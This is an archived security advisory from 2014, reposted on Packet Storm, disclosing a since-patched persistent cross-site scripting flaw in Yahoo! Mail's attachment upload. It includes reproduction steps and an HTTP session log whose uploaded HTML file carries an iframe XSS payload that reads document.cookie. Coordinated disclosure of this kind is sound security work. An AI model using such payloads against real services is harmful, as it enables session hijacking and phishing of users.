exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Yahoo! Mail Cross Site Scripting

Yahoo! Mail Cross Site Scripting
Posted Jul 11, 2014
Authored by Ateeq ur Rehman Khan, Vulnerability Laboratory | Site vulnerability-lab.com

Yahoo! Mail suffered from a cross site scripting vulnerability via the file attachment upload functionality.

tags | exploit, xss
SHA-256 | 8945f1f89b8ce25eda6550fcc02dc3e0f251dd0d613214792dc3867ab3a2b462

Yahoo! Mail Cross Site Scripting

Change Mirror Download
Document Title:
===============
Yahoo! Bug Bounty #30 YM - Application-Side Mail Encoding (File Attachment) Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1137


Release Date:
=============
2014-07-08


Vulnerability Laboratory ID (VL-ID):
====================================
1137


Common Vulnerability Scoring System:
====================================
5.3


Product & Service Introduction:
===============================
Yahoo! Inc. is an American multinational internet corporation headquartered in Sunnyvale, California. It is widely
known for its web portal, search engine Yahoo! Search, and related services, including Yahoo! Directory, Yahoo! Mail,
Yahoo! News, Yahoo! Finance, Yahoo! Groups, Yahoo! Answers, advertising, online mapping, video sharing, fantasy sports
and its social media website. It is one of the most popular sites in the United States. According to news sources,
roughly 700 million people visit Yahoo! websites every month. Yahoo! itself claims it attracts `more than half a
billion consumers every month in more than 30 languages.

(Copy of the Vendor Homepage: http://www.yahoo.com )


Abstract Advisory Information:
==============================
The Vulnerability-Laboratory Research Team has discovered a persistent input validation vulnerability in the official Yahoo! Mail Service web-application.


Vulnerability Disclosure Timeline:
==================================
2013-11-08: Researcher Notification & Coordination (Ateeq ur Rehman Khan - Core Research Team)
2013-11-09: Vendor Notification (Yahoo! Security Team - Bug Bounty Program)
2014-02-18: Vendor Response/Feedback (Yahoo! Security Team - Bug Bounty Program)
2014-06-01: Vendor Fix/Patch (Yahoo! Developer Team - Reward: HackerOne Program)
2014-07-08: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Yahoo!
Product: Yahoo! Mail - Web Application & API 2013 Q3


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent script code inject web vulnerability has been discovered in the official Yahoo Mail Service web-application & API.
The vulnerability affects the Yahoo Mail Mobile Application for iPhone, iPad and iPod touch. The vulnerability allows attackers
to upload / attach own malicious .html files and send them to other Yahoo users.

During the testing, it was discovered that using Yahoo mail, it is possible to include malicious script code within .html files
and send them as attachments to other users. It seems that the application is not performing proper validation When uploading
user attached files. Upon viewing these attached files from your iphone/ipad device, the malicious script code gets executed
directly hence leaving the victims vulnerable to persistent client side attacks.

The security risk of the persistent web vulnerability is estimated as medium with a cvss (common vulnerability scoring system)
count of 5.3. Exploitation of this vulnerability requires low user interaction. Successful exploitation of this vulnerability
results in persistent phishing, persistent client side redirects, user session hijacking and similar client side attacks.

Request Method(s):
[+] POST

Vulnerable Application(s):
[+] Yahoo! Mail - Web Application

Vulnerable Module(s):
[+] Compose Mail > File Attachments

Vulnerable Parameter(s):
[+] Attach File


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with low privileged yahoo web application
account and low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information
and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Register an yahoo mail account and login to the account system
2. Open the `compose a New Yahoo email` section
3. Click the `attach file` button in the compose mail section
4. Attach the POC.html file provided along with this advisory
5. Send out the email with the malicious test attachment to another yahoo test account
6. Using your iPad/iPhone device, click on the attachment link of the newly received POC email
7. You should now see an iframe with vulnerability labs website proving the existence of this vulnerability
8. Successful reproduce of the yahoo mail service vulnerability!


--- PoC Session Logs ---
POST /us.f1624.mail.yahoo.com/ya/upload_with_cred?output=php&cred=Encrypted HTTP/1.1
Host: bf1-attach.mail.yahoo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://us-mg6.mail.yahoo.com/neo/launch?.rand=7sd8nun2neu5c
Content-Length: 561
Content-Type: multipart/form-data; boundary=---------------------------234701259230567
Origin: http://us-mg6.mail.yahoo.com
Cookie: Hidden
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
-----------------------------234701259230567
Content-Disposition: form-data; name="filename
POC.html
-----------------------------234701259230567
Content-Disposition: form-data; name="filesize"
120
-----------------------------234701259230567
Content-Disposition: form-data; name="Filedata"; filename="POC.html"
Content-Type: text/html
'%3d'>"><iframe src='http://www.vulnerability-lab.com' onmouseover=alert(document.cookie)></iframe>/927
"><h1>Testing POC Ateeq
-----------------------------234701259230567

Response:
HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: http://us-mg6.mail.yahoo.com
Cache-Control: private
Connection: Keep-Alive
Content-Length: 322
Content-Type: text/xml
Date: Fri, 08 Nov 2013 19:12:53 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi
IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Server: HTTP/1.1 UserFiberFramework/1.0
Vary: Accept-Encoding
Via: HTTP/1.1 r03.ycpi.ac4.yahoo.net UserFiberFramework/1.0

<?xml version="1.0" encoding="UTF-8"?><Response> <attachment> <code>uploadAVNoVirus</code>
<id>e2fd91b75b55018624eef056c5913b0f</id> <name>POC.html</name> <type>text/html</type>
<size>126</size> </attachment></Response><!-- web162405.mail.bf1.yahoo.com compressed/chunked Fri Nov 8 11:12:53 PST 2013


Reference(s):
https://mail.yahoo.com


Solution - Fix & Patch:
=======================
Proper security controls should be implemented/enforced in the file attachment module to validate inputs and to persistent script code executions.


Security Risk:
==============
The security risk of persistent input validation web vulnerability in the yahoo mail service application is estimated as medium.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Ateeq ur Rehman Khan (ateeq@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2014 | Vulnerability Laboratory [Evolution Security]


--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close